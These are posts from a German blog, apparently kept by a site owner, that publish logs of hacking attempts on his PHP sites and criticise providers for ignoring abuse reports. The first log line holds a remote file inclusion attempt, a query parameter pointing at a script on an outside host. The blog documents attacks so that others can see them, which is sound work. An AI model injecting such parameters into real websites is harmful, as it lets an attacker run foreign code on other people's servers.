02-03-08 / 21:12:22 - 72.232.44.170 - /?orderby=sincedate&sortorder=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladm
in%2Flibraries%2Foduzov%2Fneloze%2F
02-03-08 / 21:12:24 - 72.232.44.170 - /index.php?page=login
02-03-08 / 21:12:29 - 72.232.44.170 - /index.php?page=showarticle&articleid=1
02-03-08 / 21:12:31 - 72.232.44.170 - /?orderby=sincedate&sortorder=asc
02-03-08 / 21:12:33 - 72.232.44.170 - /?orderby=age&sortorder=asc

Naja, es hat keiner der Amateure Schaden angerichtet, jedoch, schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster

Eingestellt von Werner Modes um 15:14 0 Kommentare
Labels: , , , , , , , ,

Stupid Hackers !?!

Hallo liebe Leser,

da das amateurhafte Hacking in letzter Zeit zunimmt, werden hier diese Hacker mit Ihren Spuren, die sie dummerweise hinterlassen, geoutet. :-)

Was mich auch stört, ist die dumme Ignroranz einiger Provider (auch deutsche), die bei Meldung eines Hacking-Angriffs aus ihrem Netz, nicht reagieren.

Bei den letzten Angriffen haben 2 von 4 deutschen Providern z. B. überhaupt nicht reagiert. Naja, da kommt bei mir der Verdacht auf, dass die wohl jeden Kunden brauchen (auch Hacker), denn die zahlen ja auch die Gebühren.

Armes Deutschland, kann ich da nur sagen, denn durch diese Ignoranz werden Straftäter geschützt!

Das ist dann auch einer der Gründe gewesen, einen Blog aufzumachen, so dass die Informationen der Angriffe nun für jeden sichtbar sind.

Viele Grüsse

Der Webmaster

Eingestellt von Werner Modes um 15:13 0 Kommentare
Labels: , , , , , , , ,

Warum gibt es diesen Blog?

Hallo liebe Leser,

ich betreibe im Internet mehrere Projekte, einige davon laufen unter PHP mit Zugriff auf eine Datenbank. Vor einiger Zeit habe ich dann mehrere Protokollierungen mit eingebunden (Besucher, Registrierungen, Logins, ect.).

Nach ein paar Tagen fand ich seltsame Zugriffe vor, die mir zuerst nichts sagten, jedoch bin ich durch diesen Bericht:

Web-Angriff-Toolkit Mpack

dann dahinter gekommen, dass es Hacking-Angriffe waren.

Ich werde ab jetzt jeden Angriff mit allen Details hier veröffentlichen, denn das sind Straftäter, schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster

Eingestellt von Werner Modes um 15:02 0 Kommentare
Labels: , , , , , , , ,
Abonnieren Posts (Atom)